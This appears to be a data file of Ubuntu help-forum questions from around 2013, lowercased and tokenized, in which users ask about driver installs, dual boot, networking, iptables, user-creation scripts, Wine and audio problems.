319568	i cant configure rhythmbox as gobject-introspection 1 is not installed	previously i advised someone on how to upgrade to rhythmbox to version 2.99.1 here . however they could n't upgrade due to gobject-introspection-1.0 not being installed . i could n't help them . now , with a brand new computer , i am getting the same problem as they had . here is the result ov ./configure simon @ simon-ts44hr : ~/downloads/rhythmbox-2.99.1 $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether to enable maintainer-specific portions of makefiles ... yes checking whether make supports nested variables ... yes checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for gobject-introspection ... configure : error : gobject-introspection-1.0 is not installed i tried to install gobject-introspection with the following simon @ simon-ts44hr : ~/downloads/rhythmbox-2.99.1 $ sudo apt-get -f install gobject-introspection [ sudo ] password for simon : reading package lists ... done building dependency tree reading state information ... done gobject-introspection is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . so i tried : simon @ simon-ts44hr : ~/downloads/rhythmbox-2.99.1 $ sudo apt-get -f install gobject-introspection-1.0 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gobject-introspection-1.0 e : could n't find any package by regex 'gobject-introspection-1.0' i have not really got to grips with installing software properly , any help would be appreciated .
319570	installed printer samsung clx-3185fw on ubuntu 12.04 . printer not responding	i got the unified driver ( .gz ) from http : //www.samsung.com/us/support/owners/product/clx-3185fw/xaa i extracted the .gzip file in my home directory and took a terminal as root : root @ joost-laptop : /home/joost/cdroot/linux # sh install.sh the `` unified linux driver installer '' started and got a message : `` environment components necessary '' . in the 'help viewer ' i read the message : `` cups must be installed before unified linux driver '' . ubuntu software centre tells met that cups is installed . the unified linux driver installation wizard says it needs sane ( sane stands for `` scanner access now easy '' ) . but my ubuntu software centre says it is already installed . i took the option `` install anyway '' and it seems it installed correctly . even printing a test page seems to function from the software point of view . only my clx-3185fw is not reacting . did n't spit out anything . anyone got 'n answer ?
319571	how to install 'main menu ' by using only terminal ?	my software centre has crashed . then i do n't have any other ways to install packages . please tell me how to install main menu ( editor ) using the terminal . i need main menu ( editor ) for editing my menu and installing other softwares in my ubuntu 13.04 desktop .
319575	wine install : file properties ( detail view ) not available in office 2007	i 've installed ms office 2007 using wine . the programs run fine , but when i want to open a file from within mso , i ca n't see the file properties ( detail view : creation date etc ) . the columns are all there but they are blank . i 've used the `` windows '' setting to change to icon view and back to detail view , but no joy . am i missing a dll ? i used instructions from : http : //nithinaneeshsct06bt.blogspot.com/2012/05/install-microsoft-office-2007-in-ubuntu.html i 'm running 12.04 with all the latest updates , on a desktop core2 duo with 8gb of ram . update 18/7/2013 : tried again in word , excel and access . the file dialog looks the same under all of these so i 'm chalking it up to a dll issue . i have mso installations running on both my desktop and a laptop and they have the same issue .
319576	ubuntu fails to install	after installing ubuntu from a usb drive , it says that it will restart . this should be fine but as soon as it opens up again it goes back to the `` try ubuntu or install '' window . when i check my partition it says it 's empty . i have no idea how to install it properly because , frankly , my computer knowledge is lacking a lot !
319577	dual boot option is not popping up	i have installed ubuntu 13.04 alongside previously installed windows 8 , and it installed pretty fast an clear , but no dual boot menu is showing up , no grub menu is shown . note : secure boot : disabled quick boot : off please advice as i do n't get so as to why dual boot is not coming after startup . it just directly loads windows 8 after hp logo . please help as soon as possible .
319578	upgrade from ubuntu 11.04 to 13.04	i have an old ubuntu version 11.04 . version is obsolă¨te . i want to upgrade directly to 13.04 version using my terminal . how can i do it ? thx in advance anis
319581	ubuntu unity 's dodge does not work after the update ( 12.04 )	ubuntu unity 's dodge does not work after today 's update in ubuntu 12.04 . these commands do not help : sudo apt-add-repository ppa : ikarosdev/unity-revamped sudo add-apt-repository ppa : garhuy/unity
319587	maas install iso download size ?	any idea what the size of the download might be the first time around right after installing maas ? i 'm experimenting at home with an ubuntu maas install . it 's a satellite link with about 1.5gb 's maximum download/upload . i 'm running 12.04.2 lts server currently . thanks in advance for any help you can provide : )
319593	how to type science equations in libre office ?	i am used to work on microsoft word . there it is easy to insert science equations . please help me how to insert equations or formula while writing notes .
319613	required space for dual boot	will a 128 gig solid state drive be big enough to comfortably run a dual boot of ubuntu and windows 7 ?
319618	can i make the maas server juju machine 0 ?	on a maas cluster , if i do a `` juju bootstrap '' , it creates a bootstrapping node from one of the free machines in the maas cluster , which becomes machine 0 . is it possible for me to make the maas server itself the bootstrapping node ?
319622	why ca n't i install the fglrx drivers for a rv620 card ?	i have done everything correctly from : what is the correct way to install ati catalyst video drivers ( fglrx ) ? and after installation i use command : gilu @ gilu-desktop : ~/catalyst $ sudo aticonfig -- intial -f aticonfig : no supported adapters detected what is not true because wiki says that : rv620 radeon hd 3450/3470 , m82 is spported . gilu @ gilu-desktop : ~ $ lspci | grep vga 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv620 le agp [ radeon hd 3450 ] what should i do ?
319624	how to set a keyboard shortcut to activate an existing internet connection	i usually click on the connection item in the connections drop-down menu in the upper right corner of the screen to activate my internet connection . is there a way to set a custom keyboard shortcut to get the same result ? hopefully a single command that i could insert among my other custom keyboard shortcuts in system settings > keyboard . thank you very much , have a good day . p.s . : the matter continues here : how to set a single shortcut to switch an internet connection on and off .
319631	how to bring up a network interface only if it is physically present	running ubuntu server 12.04 ( no gui ) . what would be the best way to make kernel bring a network interface up only if it is physically plugged in ? so , if it does n't exist , just move on with initializing other interfaces ( if any ) and continue to the login screen , without `` waiting for network configuration '' delay . e.g , i have a wireless usb key wlan9 ( in /etc/network/interfaces ) : auto wlan9 iface wlan9 inet dhcp wpa-ssid myssd wpa-psk mykey wpa-proto rsn wpa-pairwise ccmp wpa-group ccmp i tried allow-hotplug instead of auto , in which case the interface does n't get initialized automatically during the boot , and i have to do it manually with ifup wlan9 . this is not exactly what i 'm looking for . thank you .
319632	server not found with auto ethernet	almost very often i get server not found issues while surfing with auto ethernet connection . also i have tried with various options in ubuntu 12.04 lts but in vain . i 'm using wired connection . i have tried few options by google but did n't help much . i have recently installed ubuntu by scrapping windows 7 and it was super before but now worst . ifconfig output : eth0 link encap : ethernet hwaddr 00:1c : c0 : b8:27:8c inet addr:192.168.1.4 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :21c : c0ff : feb8:278c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:326314 errors:0 dropped:0 overruns:0 frame:0 tx packets:219569 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:466217759 ( 466.2 mb ) tx bytes:16693491 ( 16.6 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:4582 errors:0 dropped:0 overruns:0 frame:0 tx packets:4582 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:432075 ( 432.0 kb ) tx bytes:432075 ( 432.0 kb ) again i had server not found issues just a while ago , looks like i 'm able to ping with out any issues . 64 bytes from 8.8.8.8 : icmp_req=19 ttl=49 time=92.5 ms 64 bytes from 8.8.8.8 : icmp_req=20 ttl=49 time=92.3 ms ^c -- - 8.8.8.8 ping statistics -- - 20 packets transmitted , 20 received , 0 % packet loss , time 19025ms rtt min/avg/max/mdev = 91.790/94.960/98.017/2.371 ms i 've tried my best using this link ( how to connect to wired internet connection through terminal ? ) but its not working . please can anybody help .. on this . i 'm using a broadband wired connection can any body give me the steps to configure right from beginning . also i use router for my laptop wifi connection that works fine with out any issues but not for desktop through wired connection . cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 $ cat /etc/network/interfaces auto lo iface lo inet loopback
319637	startup disk creator is not showing the iso image	i downloaded the ubuntu 13.04 32-bit image from ubuntu.com . i am trying to create a bootable image of usb drive . startup disk creator is able to recognize the usb correctly and automatically . when i choose the iso by clicking on other ... , it does n't throw any error , but the file does not appear in the startup disk creator window . the iso is 705 mb in size and i am on 12.10 . i tried creating an empty iso file and it is not being recognized . can you please help me in this regard ? thanks in advance .
319648	prevent a user from accessing the internet , except for certain websites	i 'm trying to prevent a specific user from receiving traffic from any sites except specific sites on a whitelist . the easiest way to do this seems to be with iptables , but i have n't been able to get my iptables settings to work - the browser says it ca n't resolve the dns address . i 'm running ubuntu 12.10 . here is my iptables file so far : # generated by iptables-save v1.4.12 on sat jul 13 07:41:12 2013 *filter : input accept [ 3137:3823422 ] : forward accept [ 0:0 ] : output accept [ 1877:121508 ] -a input -s [ [ specific ip ] ] -j accept -a input -s tcp -- dport 53 -j accept # -a input -p udp -- dport 53 -j accept # these 3 lines are an attempt to get dns to work -a input -p tcp -- dport 953 -j accept # -a input -m owner -- uid-owner 1000 -j drop # disable all other packets for that user commit # completed on sat jul 13 07:41:12 2013 that file is loaded on startup using sudo iptables-restore < /etc/iptables_rules , which works . no sshing is needed anywhere . the immediate problem is that dns lookups fail for that user . i 'm probably doing something completely wrong , i do n't know iptables well . thanks for all help ! : )
319649	replacing windows with linux ubuntu 12.04 lts	i am working on the best way to eliminate windows xp from my older desktop and replace it with linux ubuntu 12.04 lts as my sole operating system . i 've done a dual boot alongside windows to get used to ubuntu like many people have done . now , i would like to totally have ubuntu as the os . any suggestions ? i 've read that if you 've had problems with a cd , disc , install that some have gone to a network boot option and had to upgrade their bios if their older desktop does n't match . am i thinking correctly ?
319650	how can i install a .deb file from command line ?	i am running 13.04 and in terminal i am trying to install guitar pro 6 for linux as it will not install with ubuntu software center . i am in the correct directory and if i ls the directory , i get gp6.deb which is the folder i downloaded guitarpro6 to , but when i use apt-get install gp6.deb terminal accepts the command but says it can not locate the file . am i using the correct command or must i do something else first ?
319653	how can i defrag an ntfs hard drive from ubuntu ?	i state i am asking if it is possible and how . i note many forum answers are 'you ca n't ' or 'you do n't need to on linux cause it is perfect and wonderful ' - none of these answers will help . firstly , the hdd in question is sata 163 gb and contains only backup data like music , video and no windows programs or installations . i have had a hdd failure in second hdd that is completely fubar so have lost my windows installation , this hdd had linux and windows dual boot , hdd is undetectable in bios . the working hdd is 130gb full with capacity of 163gb ( it is badly fragmented due to excessive use ... ) . i intend to defrag this drive using usb linux os ( bootable usb with installation files and 'trial ' ) and any other programs that will enable this task . once this is done i intend to locate which data areas are free ( the end of hdd data storage area ) , create a new partition on this free space , install linux full version and get things working . +++ i understand fully the following : i can buy a new hdd for install . i can get an external hard drive , back up the data . i also understand that copying off backup hdd and then copying back will do the same as defrag . i ask this question to find out how to complete this action i have requested and not to complete it using the methods unavailable to me at this time . thanks
319668	how do i fix this directx error on windows vmware guest ?	i have vmware player 5.0.2 build-1031769 on kubuntu 12.04.2 lts ( 3.2.0-49-generic ) and graphic card nvidia geforce 310m driver installed . when i run an application , which plays a sequence of images , on virtual disc with windows xp as guest the images are not shown and i get a diretx exception ( see attached image directx exception ) . everytime i run the vmware disc i get a message related to vmware tools -which i have already installed . note that on a windows host it works correctly , on ubuntu/kubuntu it does n't . perhaps there are issues about nvidia graphic drivers ? !
319671	how to change the graphics card driver via terminal ?	i recently tried changing the driver for my asus radeon hd 7870 to the proprietary one ( a friend told me it was much faster ) , however that seems to have killed my install of ubuntu . now whenever i boot up it shows me grub , i select ubuntu , and then it boots up for a second or two and then blackscreens . i think the blackscreen is caused by it reaching the login screen , as it is also at that point that i can ssh into it . so can anyone tell me how to switch back to the open source driver ? edit : and i 'll add , when i boot ubuntu off of a usb , everything works fine . edit : ok here my process is for the driver . install radeon hd 7870 in my system boot up , everything is working fine automatically i go and check and it is using the open source driver ( i checked by going into the software and updates program and going to the driver tab ) a friend recommends i switch to the propietary one as it is faster ( i believe it was something along the lines of flgrx-updates ) i go into the software and updates program , and navigate to the drivers tab . from there i selected the flgrx-updates one and hit ok . i reboot my system , and then it wo n't work . after some basic troubleshooting , i come here . update : thanks to gertvdijk i have managed to disable the propietary driver , but ubuntu still will not beat up . i 'm guessing that for whatever reason the open source driver has not been automatically enabled . anyone have any ideas ? are there any system logs i can give you guys to help find the problem ?
319673	ubuntu 13.04 : audio does not work on hp probook 4530s	i 'm having a problem with the build in audio of my hp probook 4530s laptop ( with ubuntu 13.04 ) , there is no sound at all . if i connect a usb headphone , the headphone does work correctly . so i guess the problem is related to driver for the audio chip . the audo chip detected by lspci is `` audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) '' . aplay -l ** list of playback hardware devices ** card 0 : pch [ hda intel pch ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 cat /proc/asound/version advanced linux sound architecture driver version k3.8.0-26-generic . stephan @ stephan-hp-probook-4530s : ~ $ head -n 1 /proc/asound/card*/codec # * == > /proc/asound/card0/codec # 0 < == codec : idt 92hd87b1/3 == > /proc/asound/card0/codec # 3 < == codec : intel cougarpoint hdmi any ideas on how to get the audio working ? the build in audio of this laptop never worked on ubuntu , but in windows it used to work fine .
319678	can i replace windows hd for new hd , install ubuntu and then switch back to old windows hd ?	i plan to install ubuntu on a friend 's computer on a new hard drive but do n't want to break their existing setup in case i ca n't get it working or they do n't like it . i want to unplug and replace the existing ( small ) hd containing windows xp with a new clean hd install windows and then ubuntu on a separate partition ( dual boot ) all on new hd then , if something goes wrong ... if i simply unplug the new hd and replace with the old windows hd , will the computer still boot as before ? or , when i install grub2 on the new hd are the computer bios settings changed that will prevent the old hd from booting when it is put back ? btw : the computer is more than 10 years old ( dell ) and ca n't boot from usb and i failed to boot ubuntu from a live cd , despite it working on my own pc . thanks
319679	fresh install of ubuntu 13.04 with only one partition : can i add a /home partition now ?	i installed a fresh ubuntu 13.04 on my macbook pro ( 5,3 edition , 2009 , sata hard drive , 320 gbytes ) . i used the automatic partition . now i 'd like to put my /home on a new partition so that , if i ever break my system , i can safely reinstall the system without losing all my personnel files . i guess i must install gparted , but can i transfer /home while working within my session ? or should i use command lines in a terminal ? or should i start from the install cd ? what 's the safiest `` modus operandi '' ?
319680	how to install mac os theme on ubuntu 12.10 ?	i am using ubuntu 12.10 . as i was inspired by mac os theme , i want to install that theme in my pc . can you suggest me the way to install it in my pc ?
319681	ubuntu 12.04 gta sa install with wine	i tried install gta sa on ubuntu 12.04 ( with the original cd and i don´t have a partion with windows ) with wine . the installation goes well but when i tried to play , the play run until the second logo and then it´s stop and became black . i don´t know if the problem is something concerne about the driver nvidia because in the section drivers adittional i don´t have any information . plus i made the installiont in the right way ( and tried many ways ) so please help me ! ( i have already play in this computer but when i have windows and i never had a problem plus i play wow with wine and it does ritgh ) thank you
319683	from bios to login screen now takes 20 minutes . how do fix it ?	when i start my machine , bios loads , grub loads , then i go from the purple screen to a blank black screen with blinking cursor , login wo n't appear for 20 minutes or so . several lines of code appear and seem to indicate something is timing out , but they 're not onscreen long enough to read . this just started yesterday morning . i update daily . intel graphics drivers just updated . bios up to date . ubuntu 13.04 raring ringtail . toshiba satellite l305-s5915 , celeron m , 2gb ram what do i do ? edit : thanks to troym and tenplus1 , i dl 'd the old kernel ( -25 ) and rebooted into it . works fine .
319691	why does `` amd testing use only '' pop up upon login ?	i have just used this website to follow some of the steps to manually create the .deb file from the .zip file that is on the amd site . then i installed them one by one using the debpackage installer . so i did n't used the command line , but the graphical interface of my os . the problem is that when i log in i get this message : `` amd testing use only '' here is my fglrxinfo : : ~ $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6500m/5600/5700 series opengl version string : 4.2.12337 compatibility profile context 9.01 have i done something in the wrong way ?
319692	office application on ubuntu phone	what will be the default office app on ubuntu , is it libreoffice ? besides , what could be the common apps for phone and pc ? is it possible to port them to phone without reprogramming ?
319695	usb drive not recognized , doest now show in lsusb or fdisk -l	i have a ubuntu ppc install : linux mini 3.2.0-17-powerpc # 27-ubuntu fri feb 24 15:40:47 utc 2012 ppc ppc ppc gnu/linux when i plugin an usb device i get the following in dmesg : [ 1253131.264079 ] usb 1-1 : usb disconnect , device number 2 [ 1253134.962851 ] usb 1-1 : new high-speed usb device number 3 using ehci_hcd [ 1253135.105530 ] scsi3 : usb-storage 1-1:1.0 [ 1253136.307732 ] scsi 3:0:0:0 : direct-access usb flash disk 1100 pq : 0 ansi : 4 [ 1253136.315093 ] sd 3:0:0:0 : attached scsi generic sg2 type 0 [ 1253136.315154 ] sd 3:0:0:0 : [ sdc ] 3915776 512-byte logical blocks : ( 2.00 gb/1.86 gib ) [ 1253136.315886 ] sd 3:0:0:0 : [ sdc ] write protect is off [ 1253136.315894 ] sd 3:0:0:0 : [ sdc ] mode sense : 43 00 00 00 [ 1253136.316664 ] sd 3:0:0:0 : [ sdc ] no caching mode page present [ 1253136.316676 ] sd 3:0:0:0 : [ sdc ] assuming drive cache : write through [ 1253136.321883 ] sd 3:0:0:0 : [ sdc ] no caching mode page present [ 1253136.321899 ] sd 3:0:0:0 : [ sdc ] assuming drive cache : write through [ 1253136.323481 ] sdc : sdc1 [ 1253136.326510 ] sd 3:0:0:0 : [ sdc ] no caching mode page present [ 1253136.326523 ] sd 3:0:0:0 : [ sdc ] assuming drive cache : write through [ 1253136.326532 ] sd 3:0:0:0 : [ sdc ] attached scsi removable disk automount does not work and neither does fdisk -l : /dev/sda # type name length base ( size ) system /dev/sda1 apple_partition_map apple 63 @ 1 ( 31.5k ) partition map /dev/sda2 apple_bootstrap untitled 1954 @ 64 ( 977.0k ) newworld bootblock /dev/sda3 apple_unix_svr2 untitled 153328126 @ 2018 ( 73.1g ) linux native /dev/sda4 apple_unix_svr2 swap 2971295 @ 153330144 ( 1.4g ) linux swap /dev/sda5 apple_free extra 49 @ 156301439 ( 24.5k ) free space block size=512 , number of blocks=156301488 devicetype=0x0 , deviceid=0x0 i can manually mount the drive but can not list the partitions or format them . can you help me ?
319697	unable to log in and unable to reset the password	i was reading some blog and i found that i can manually start gui by issuing this command sudo startx , so i did that . i did it in the terminal with the gui already running . now i 'm unable to login to my user account . before that my pc used to boot straight into my account without asking for the password ( without even showing the grub menu since i have only ubuntu 12.04 installed on my pc ) . but now it boots and lands in a screen ( without showing the grub menu ) which displays my user account along with the guest account . when i choose my account , it asks for the password . i entered the password but it comes back again to the same screen without any response . i am damn sure that the password that i entered was right . when i choose the guest account , everything goes well . now i have access only to the guest account . before posting this question , i read similar questions posted here : my user id and password is correct : can not log in to ubuntu 12.04 unable to log in to my account 12.04lts log in fails and i tried solutions suggested for them but nothing worked . this page ( https : //help.ubuntu.com/community/lostpassword ) and this page ( https : //wiki.ubuntu.com/recoverymode ) seems to provide some solutions but i could not bring up the grub menu by pressing the shift key or the esc key . while booting , i kept pressing the keys ( i tried both the keys separately ) but it would land straight onto the screen displaying user accounts . i logged into the guest user and changed my administrator account to standard one . i have no way to know what the root password is . i opened the terminal in the guest account and entered sudo passwd root . it returned the following : sudo : unable to change sudoers gid : operation not permitted sudo : setresuid ( ) [ 0 , 0 , 0 ] - > [ 128 , -1 , -1 ] : operation not permitted now i can not access any of my files or folders . are there any possible solutions to my problem without re-installing the os ? is there any way to reset all the user accounts and regain access to my account ?
319707	ubuntu 13.04 , python 2.7 , alsa audio problems	i am using ubuntu 13.04 ... having alsa sound problems with python . using aplay , i can play a *.wav from the command line - works fine other apps using sound card - work fine i am using python 2.7 ; i have installed several python alsa packages ... . but not working for me here is what i currently have , regarding alsa : sudo dpkg -- get-selections | grep alsa alsa-base install alsa-utils install bluez-alsa : i386 install gnome-alsamixer install gstreamer0.10-alsa : i386 install gstreamer1.0-alsa : i386 install python-alsaaudio install python-pyalsa install i could send along lots of others info but not sure relevant . if you could make a few suggestions of things to check , i will get busy ... not working - > 1 ) python gives no errors , plays the file , i hear no sound . 2 ) from the desktop , go to sound , test - > works fine 3 ) from the command line , use aplay + way file , works fine conclusion : python2.7 + ubuntu + alsa - > does not work - > does not play the wav sound file correctly - > i hear nothing
319714	proper way to add a user account via bash script	here 's the script code i 'm using now : getent group $ mygroup if [ $ ? -ne 0 ] ; then sudo su -c `` groupadd $ mygroup '' fi sudo su -c `` useradd mynewuser -p mypassword -m -g $ primarygrp -g $ mygroup '' this approach works well on opensuse . but there are several problems with the user account it creates on ubuntu so i am seeking help here . the terminal prompt is n't set ( echo $ ps1 returns nothing ) the arrow keys and tab key do not work correctly in the terminal the password does n't seem to work ( although i 'm still unclear exactly what this issue is ) the /etc/sudoers rights set for this new user are not honored if instead i manually create the user with adduser ( instead of useradd ) i do n't have these problems on ubuntu . but i ca n't use adduser on opensuse ( afaik ) . therefore , i need a non-debian-exclusive script or method of adding user accounts via my bash script that works on ubuntu ( and does n't stop working on other distros ) . finally , i would like to understand the differences between adduser and useradd . for example , i want to know which skeleton directory is used by adduser as that might be the reason useradd is n't working as expected ( because i just accepted the default ) . thanks
319719	equivalent to in org.gnome.screensaver kde	i have a script that automatically disables my usb mouse when the screen is locked or idle . ( because my mouse is too sensible ) . it monitors the activity org.gnome.screensaver , like this : dbus-monitor -- session `` type='signal ' , interface='org.gnome.screensaver ' '' | ( while read line ; do ... . i have switched to kde last week , and this , obviously has stopped working . i have tried using org.kde.screensaver , but it did not work . what should i use , so that the script detects the locked screen/ idle screen ? thanks !
319723	run .sh script on ubuntu without using terminal	i 'm using ubuntu and i 've created a simple script file : # ! /bin/bash cp /home/guilherme/pictures/*.jpg /home/guilherme/backup when i run it on terminal typing the command `` ./script.sh '' it works fine . but when i try to click on this file outside the terminal , it opens my text editor to edit the lines of the script instead of opening the terminal and execute the commands . i already gave the executable permission to this file , but it does not run . any ideas ?
319725	file transfer speeds different depending on direction of file transfer windows-ubuntu 13.4	i have a small home network with an ubuntu 13.4 htpc attached to a gigabit switch in one room and a win7 pc attached to another gigabit switch in another room . on ubuntu : simple cut and paste file transfers pushed from htpc to win7 are consistently 10-15mb/sec . simple cut and paste file transfers pulled from win7 to htpc are consistently 20-30mb/sec . on win7 : simple cut and paste file transfers pulled from htpc to win7 start at 115mb/s and stabilize at 40mb/s . simple cut and paste file transfers pushed from win7 to htpc start at 115mb/s and stabilize at 60mb/s . my test was a single 3gb video file cut and pasted back and forth many times but all my daily video file transfers show similar speeds . none of the other network devices are active at the time of the test , just a straight wired ethernet transfer across 2 switches from pc to pc . is this normal ? should n't i expect the ubuntu controlled file transfers to go faster ? i would accept 30mb/s but most of my transfers are in the 15mb/s direction . i am a ubuntu novice , my setup is fairly vanilla with just mythtv installed beyond the basics . what more information do i need to supply to track down this issue ? ( include instructions , i might not know how to do what you ask )
319731	fluidsynth vs. timidity 2.13 -- why does the former play beautiful cymbals and the latter play trashy ones ?	previously i had been using vlc fluidsynth to export my midis to other formats , until recently when i discovered that it was ever-so-slightly out of tune and timidity actually played my songs without clipping . that was a major plus . however , there was one thing that fluidsynth did absolutely awesomely , and that was play percussion . every time it played cymbals they must have lasted at least one and a half seconds , and they sounded great . but when i play the same midi in timidity with the same soundfont , it always cuts off the cymbals , playing them for maybe half a second . i even tried assigning all the drums to a different soundfont but they still got cut off . is there any way i can get timidity to stop doing this ? i know i could export the drums from vlc and the melody from timidity and put them together in audacity , but that 's kind of a pain , especially when timidity should seemingly be able to play cymbals right itself .
319736	how to automatically mount a partition or drive on program launch ?	when i launch ( start ) the program banshee , i want ubuntu to automatically mount a particular unmounted partition . i do n't want to mount this partition at boot time or upon login
319738	cd/dvd burner does not recognize any dvds	just upgraded to ubuntu 13.04 and it no longer recognizes dvds , either commercial or recordable dvd+r . cds read and write just fine . any ideas ? thanks .
319739	difference between installing libx : i386 and lib32x	there 's a series of libs available in the ubuntu repositories like lib32stdc++6 and lib32ncurses5 . you can either install these on a 64 bit system , or go for installing libstdc++6 : i386 and libncurses5 : i386 . i 'm interested to learn what the difference is between the two types of packages . what is the actual difference ? why are they both available ? being under the impression that libx : i386 is the new way of doing things , is this method always preferred over installing the lib32x variant ? having a couple of lib32x and a couple of libx : i386 libraries already installed also makes me wonder if it would be a good idea to switch to only one type of package by replacing them with there counterparts .
319743	is there an easier or more 'correct ' way to open gedit as root ?	i have ubuntu 12.04 running in a virtual machine on virtual box . its existence is mainly as a 'toy ' to play about with ubuntu , so for this reason i wanted the gui ( is that what 'dash ' is in ubuntu 12.04 ? anyway ... ) one thing i am currently using this machine for is a lamp server . i use 'gedit ' to edit my files , but because i have n't correctly set permissions yet i just open it with sudo in terminal . just now , to try to simplify this process i created a shell script on the desktop with a very simple job - sudo gedit i ca n't help thinking there must be an even more obvious way to open gedit as root from the gui than this . so is there ? edit : i just 'improved ' my script by replacing sudo with gksudo . now i do n't have to have a terminal window open while gedit is open . so i guess this is quite convenient for now : ) it would be good , for the sake of knowledge , to know if this is anything close to how the more seasoned ubuntu users would do this type of thing .
319744	video downloaders need	i am using ubuntu 13.04 . the browsers i am using are firefox and google chrome . now i want to download videos from youtube . accordingly i 've tried some extensions in firefox and chrome . but no luck , the connection is being disrupted before the completion of the downloads . any suggestions of best downloader of videos from various sites including youtube ? thanks
319747	how do i get an ubuntu iso that matches my virtual box image ?	i’ve downloaded the ubuntu linux 12.04 x86 vitual box image and i got the iso for the os ( as iso ) from the ubuntu site . but there looks to be a difference . the ubuntu site downloads 12.04.2 , when i open my vm it asks if i want to install along side . that wasn’t what i expected , it feels like i have a miss matching vm and os . is that likely ?
319748	how can i integrate pidgin with the indicator/messaging menu without displaying popups ?	since the usability gods work in mysterious ways , in 13.04 it 's no longer possible to whitelist systray icons that i want to see . while the messaging menu is less useful than the flashing pidgin icon ( since i ca n't configure it to flash ) , it seems i 'll have to make do with it . so i managed to get pidgin to integrate with that by enabling the libnotify-plugin in pidgin . however , that leaves me with another problem : how can i have this work ( i.e . trigger the messaging menu icon and integrate with that menu ) without it actually showing popups for each of those events ? at work , i 'm often showing coworkers things on my machine , and it is extremely distracting to have these popups show up all the time , not to mention sometimes a privacy issue . yet when i turn them off , i get no notification whatsoever . what can i do ?
319754	new user , new install , wifi does n't work	brand new to ubuntu/linux . trying to get hp mini netbook working better . it was unusable with windows 7 ( too slow ) . so far it flies with ubuntu , but no wifi . i can see all the wifi connections from my home , the neighbors , etc . i believe it connected briefly during installation , but i ca n't get it to connect now . this is a clean install . the wifi for all other home devices is working fine . network specs are below . one of the moderators said it should work . the wired interface is working great , btw . thank you in advance for your help machine is hp mini 110 . ubuntu version is 13.04 . would i have better luck with 12.04 ? 01:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:148a ] kernel driver in use : r8169 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : hewlett-packard company device [ 103c:145c ] kernel driver in use : wl
319760	using imac running ubuntu as monitor for macmini running osx	so , what i want to do is use my imac ( which is running ubuntu ) as a monitor for my macmini . i am using the hdmi out on the macmini . i have the hdmi cable being converted to minidisplayport and have that going into the imac . is there any way i will be able to use the imac as a monitor for the macmini ? if so , how ?
319762	compiled programs in 13.04 missing icons in launch bar ( defaults to question mark )	i use a custom compiled version of wine and minitube ( no actual source changed , just compiled instead of installed from software centre ) , however for some reason their icons show up as grey question marks instead of the standard icon files . i 'm pretty sure it 's not an installation issue . i 've attached my minitube installation log , if that 's of any help : gem @ hal9000 : ~/downloads/minitube $ sudo make install install -m 755 -p `` build/target/minitube '' `` /usr/bin/minitube '' strip `` /usr/bin/minitube '' cp -f -r /home/gem/downloads/minitube/build/target/locale /usr/share/minitube/ install -m 644 -p /home/gem/downloads/minitube/minitube.desktop /usr/share/applications/ install -m 644 -p /home/gem/downloads/minitube/data/minitube.svg /usr/share/icons/hicolor/scalable/apps/ install -m 644 -p /home/gem/downloads/minitube/data/16x16/minitube.png /usr/share/icons/hicolor/16x16/apps/ install -m 644 -p /home/gem/downloads/minitube/data/22x22/minitube.png /usr/share/icons/hicolor/22x22/apps/ install -m 644 -p /home/gem/downloads/minitube/data/32x32/minitube.png /usr/share/icons/hicolor/32x32/apps/ install -m 644 -p /home/gem/downloads/minitube/data/48x48/minitube.png /usr/share/icons/hicolor/48x48/apps/ install -m 644 -p /home/gem/downloads/minitube/data/64x64/minitube.png /usr/share/icons/hicolor/64x64/apps/ install -m 644 -p /home/gem/downloads/minitube/data/128x128/minitube.png /usr/share/icons/hicolor/128x128/apps/ install -m 644 -p /home/gem/downloads/minitube/data/256x256/minitube.png /usr/share/icons/hicolor/256x256/apps/ install -m 644 -p /home/gem/downloads/minitube/data/512x512/minitube.png /usr/share/icons/hicolor/512x512/apps/ so , any idea what 's going on and how can i fix it ? ubuntu 13.04 , fresh install .
319764	how to uninstall pre-installed programs in xubuntu	i am just getting into linux for the first time , and i am loving it . right now , i am trying to give some older hardware a new breath of life by installing linux on it . the newest version of ubuntu is just a little too much for the hardware i am working with , but xunbuntu seems to run fairly snappy with minimal issues . from what i understand , the xfce interface is fairly different than the gnome desktop , so i am not too sure if this would be the right forum for this distro . i wanted to know if there was a way to uninstall pre-installed programs like abiword , or the gimp . it has a very limited hard drive capacity , so every byte counts ! also , any other tips on speeding up xubuntu would be greatly appreciated .
319765	installing netflix in xubuntu , any luck ?	i am working in xubuntu right now , and am having a tough time installing the netflix desktop . i have tried the method mentioned in this video , which from my understanding , is simply the only way to install it . after the terminal says the install is done , i ca n't find netflix desktop anywhere , even when i search my applications . does this program simply not work in xubuntu ? anyone have had any luck running it ? thanks !
